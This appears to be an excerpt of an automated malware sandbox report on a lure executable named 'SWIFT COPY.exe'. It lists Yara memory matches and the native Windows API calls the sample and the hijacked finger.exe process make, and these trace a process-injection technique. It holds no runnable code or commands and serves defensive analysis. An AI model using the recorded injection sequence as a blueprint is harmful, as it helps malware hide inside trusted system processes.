                Source: Yara matchFile source: 00000003.00000002.2224196116.0000000000E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3579400562.0000000002390000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2227839219.0000000001800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0042C743 NtClose,3_2_0042C743
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372B60 NtClose,LdrInitializeThunk,3_2_01372B60
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01372DF0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01372C70
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013735C0 NtCreateMutant,LdrInitializeThunk,3_2_013735C0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01374340 NtSetContextThread,3_2_01374340
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01374650 NtSuspendThread,3_2_01374650
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372BA0 NtEnumerateValueKey,3_2_01372BA0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372B80 NtQueryInformationFile,3_2_01372B80
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372BF0 NtAllocateVirtualMemory,3_2_01372BF0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372BE0 NtQueryValueKey,3_2_01372BE0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372AB0 NtWaitForSingleObject,3_2_01372AB0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372AF0 NtWriteFile,3_2_01372AF0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372AD0 NtReadFile,3_2_01372AD0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372D30 NtUnmapViewOfSection,3_2_01372D30
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372D10 NtMapViewOfSection,3_2_01372D10
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372D00 NtSetInformationFile,3_2_01372D00
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372DB0 NtEnumerateKey,3_2_01372DB0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372DD0 NtDelayExecution,3_2_01372DD0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372C00 NtQueryInformationProcess,3_2_01372C00
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372C60 NtCreateKey,3_2_01372C60
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372CA0 NtQueryInformationToken,3_2_01372CA0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372CF0 NtOpenProcess,3_2_01372CF0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372CC0 NtQueryVirtualMemory,3_2_01372CC0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372F30 NtCreateSection,3_2_01372F30
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372F60 NtCreateProcessEx,3_2_01372F60
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372FB0 NtResumeThread,3_2_01372FB0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372FA0 NtQuerySection,3_2_01372FA0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372F90 NtProtectVirtualMemory,3_2_01372F90
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372FE0 NtCreateFile,3_2_01372FE0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372E30 NtWriteVirtualMemory,3_2_01372E30
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372EA0 NtAdjustPrivilegesToken,3_2_01372EA0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372E80 NtReadVirtualMemory,3_2_01372E80
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372EE0 NtQueueApcThread,3_2_01372EE0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01373010 NtOpenDirectoryObject,3_2_01373010
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01373090 NtSetValueKey,3_2_01373090
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013739B0 NtGetContextThread,3_2_013739B0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01373D10 NtOpenProcessToken,3_2_01373D10
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01373D70 NtOpenThread,3_2_01373D70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03094340 NtSetContextThread,LdrInitializeThunk,7_2_03094340
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03094650 NtSuspendThread,LdrInitializeThunk,7_2_03094650
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092B60 NtClose,LdrInitializeThunk,7_2_03092B60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_03092BA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092BE0 NtQueryValueKey,LdrInitializeThunk,7_2_03092BE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_03092BF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092AD0 NtReadFile,LdrInitializeThunk,7_2_03092AD0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092AF0 NtWriteFile,LdrInitializeThunk,7_2_03092AF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092F30 NtCreateSection,LdrInitializeThunk,7_2_03092F30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092FB0 NtResumeThread,LdrInitializeThunk,7_2_03092FB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092FE0 NtCreateFile,LdrInitializeThunk,7_2_03092FE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_03092E80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092EE0 NtQueueApcThread,LdrInitializeThunk,7_2_03092EE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092D10 NtMapViewOfSection,LdrInitializeThunk,7_2_03092D10
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_03092D30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092DD0 NtDelayExecution,LdrInitializeThunk,7_2_03092DD0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03092DF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092C60 NtCreateKey,LdrInitializeThunk,7_2_03092C60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_03092C70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_03092CA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030935C0 NtCreateMutant,LdrInitializeThunk,7_2_030935C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030939B0 NtGetContextThread,LdrInitializeThunk,7_2_030939B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092B80 NtQueryInformationFile,7_2_03092B80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092AB0 NtWaitForSingleObject,7_2_03092AB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092F60 NtCreateProcessEx,7_2_03092F60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092F90 NtProtectVirtualMemory,7_2_03092F90
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092FA0 NtQuerySection,7_2_03092FA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092E30 NtWriteVirtualMemory,7_2_03092E30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092EA0 NtAdjustPrivilegesToken,7_2_03092EA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092D00 NtSetInformationFile,7_2_03092D00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092DB0 NtEnumerateKey,7_2_03092DB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092C00 NtQueryInformationProcess,7_2_03092C00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092CC0 NtQueryVirtualMemory,7_2_03092CC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092CF0 NtOpenProcess,7_2_03092CF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03093010 NtOpenDirectoryObject,7_2_03093010
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03093090 NtSetValueKey,7_2_03093090
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03093D10 NtOpenProcessToken,7_2_03093D10
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03093D70 NtOpenThread,7_2_03093D70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02899340 NtCreateFile,7_2_02899340
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02899630 NtClose,7_2_02899630
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02899790 NtAllocateVirtualMemory,7_2_02899790
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_028994A0 NtReadFile,7_2_028994A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02899590 NtDeleteFile,7_2_02899590
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_04FB22F80_2_04FB22F8
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_04FB206B0_2_04FB206B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_04FB20330_2_04FB2033
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_04FB21ED0_2_04FB21ED
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_04FB21090_2_04FB2109
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_04FB2BB80_2_04FB2BB8
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_04FB2BA80_2_04FB2BA8
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_04FB34400_2_04FB3440
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_04FB16600_2_04FB1660
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_04FB16510_2_04FB1651
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_04FB37600_2_04FB3760
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_04FB37500_2_04FB3750
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_04FB31990_2_04FB3199
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_04FB1DE90_2_04FB1DE9
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_04FB1D710_2_04FB1D71
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_04FB1E560_2_04FB1E56
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_04FB1FD60_2_04FB1FD6
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_04FB1AEE0_2_04FB1AEE
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_04FB1B9F0_2_04FB1B9F
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A0B900_2_099A0B90
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A95980_2_099A9598
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A2CF80_2_099A2CF8
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A14500_2_099A1450
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A7F700_2_099A7F70
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A1E880_2_099A1E88
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A39E00_2_099A39E0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A89510_2_099A8951
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A89600_2_099A8960
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A38A00_2_099A38A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A18D80_2_099A18D8
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A18E80_2_099A18E8
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A00060_2_099A0006
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A00400_2_099A0040
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A3BD80_2_099A3BD8
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A3BCA0_2_099A3BCA
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A2BE00_2_099A2BE0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A0AF20_2_099A0AF2
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A82180_2_099A8218
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A82280_2_099A8228
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A52780_2_099A5278
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A52680_2_099A5268
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A958A0_2_099A958A
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A4DD00_2_099A4DD0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A4DE00_2_099A4DE0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A8D100_2_099A8D10
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A8D200_2_099A8D20
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A85580_2_099A8558
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A85680_2_099A8568
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A34800_2_099A3480
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A2C100_2_099A2C10
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099AA4380_2_099AA438
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A54580_2_099A5458
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A544A0_2_099A544A
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099AA4480_2_099AA448
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A14400_2_099A1440
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A4FD80_2_099A4FD8
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A4FE80_2_099A4FE8
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A7F620_2_099A7F62
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A9E980_2_099A9E98
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A9E880_2_099A9E88
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_099A1E790_2_099A1E79
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_09B731310_2_09B73131
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_09B731400_2_09B73140
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_09B738080_2_09B73808
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_09B710480_2_09B71048
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_09B714900_2_09B71490
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_09B714800_2_09B71480
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_09B77CF80_2_09B77CF8
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_09B727900_2_09B72790
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_09B7277F0_2_09B7277F
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_09D400400_2_09D40040
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_09D4A5940_2_09D4A594
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_09D4C1180_2_09D4C118
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_004186733_2_00418673
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_004100F33_2_004100F3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0040E0FB3_2_0040E0FB
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_004168833_2_00416883
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0040E1033_2_0040E103
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_004029C83_2_004029C8
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_004021833_2_00402183
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_004021903_2_00402190
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0040E2493_2_0040E249
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0040E2533_2_0040E253
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_004023413_2_00402341
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_004023503_2_00402350
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_00402C833_2_00402C83
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0042ED333_2_0042ED33
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0040FED33_2_0040FED3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_00402E903_2_00402E90
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DA1183_2_013DA118
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013301003_2_01330100
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C81583_2_013C8158
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013F41A23_2_013F41A2
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_014001AA3_2_014001AA
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013F81CC3_2_013F81CC
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D20003_2_013D2000
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013FA3523_2_013FA352
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_014003E63_2_014003E6
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134E3F03_2_0134E3F0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E02743_2_013E0274
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C02C03_2_013C02C0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013405353_2_01340535
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_014005913_2_01400591
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E44203_2_013E4420
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013F24463_2_013F2446
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013EE4F63_2_013EE4F6
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013407703_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013647503_2_01364750
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133C7C03_2_0133C7C0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135C6E03_2_0135C6E0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013569623_2_01356962
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A03_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0140A9A63_2_0140A9A6
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134A8403_2_0134A840
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013428403_2_01342840
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013268B83_2_013268B8
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E8F03_2_0136E8F0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013FAB403_2_013FAB40
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013F6BD73_2_013F6BD7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133EA803_2_0133EA80
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DCD1F3_2_013DCD1F
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134AD003_2_0134AD00
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01358DBF3_2_01358DBF
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133ADE03_2_0133ADE0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340C003_2_01340C00
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E0CB53_2_013E0CB5
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01330CF23_2_01330CF2
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01360F303_2_01360F30
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E2F303_2_013E2F30
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01382F283_2_01382F28
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B4F403_2_013B4F40
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013BEFA03_2_013BEFA0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01332FC83_2_01332FC8
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013FEE263_2_013FEE26
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340E593_2_01340E59
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01352E903_2_01352E90
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013FCE933_2_013FCE93
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013FEEDB3_2_013FEEDB
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0140B16B3_2_0140B16B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132F1723_2_0132F172
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0137516C3_2_0137516C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134B1B03_2_0134B1B0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013F70E93_2_013F70E9
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013FF0E03_2_013FF0E0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013EF0CC3_2_013EF0CC
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013470C03_2_013470C0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013F132D3_2_013F132D
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132D34C3_2_0132D34C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0138739A3_2_0138739A
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013452A03_2_013452A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135D2F03_2_0135D2F0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E12ED3_2_013E12ED
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135B2C03_2_0135B2C0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013F75713_2_013F7571
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_014095C33_2_014095C3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DD5B03_2_013DD5B0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013FF43F3_2_013FF43F
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013314603_2_01331460
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013FF7B03_2_013FF7B0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013856303_2_01385630
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013F16CC3_2_013F16CC
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D59103_2_013D5910
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013499503_2_01349950
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135B9503_2_0135B950
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AD8003_2_013AD800
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013438E03_2_013438E0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013FFB763_2_013FFB76
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135FB803_2_0135FB80
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B5BF03_2_013B5BF0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0137DBF93_2_0137DBF9
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B3A6C3_2_013B3A6C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013FFA493_2_013FFA49
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013F7A463_2_013F7A46
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DDAAC3_2_013DDAAC
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01385AA03_2_01385AA0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E1AA33_2_013E1AA3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013EDAC63_2_013EDAC6
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013F7D733_2_013F7D73
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013F1D5A3_2_013F1D5A
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01343D403_2_01343D40
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135FDC03_2_0135FDC0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B9C323_2_013B9C32
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013FFCF23_2_013FFCF2
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013FFF093_2_013FFF09
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013FFFB13_2_013FFFB1
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01341F923_2_01341F92
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01303FD23_2_01303FD2
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01303FD53_2_01303FD5
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01349EB03_2_01349EB0
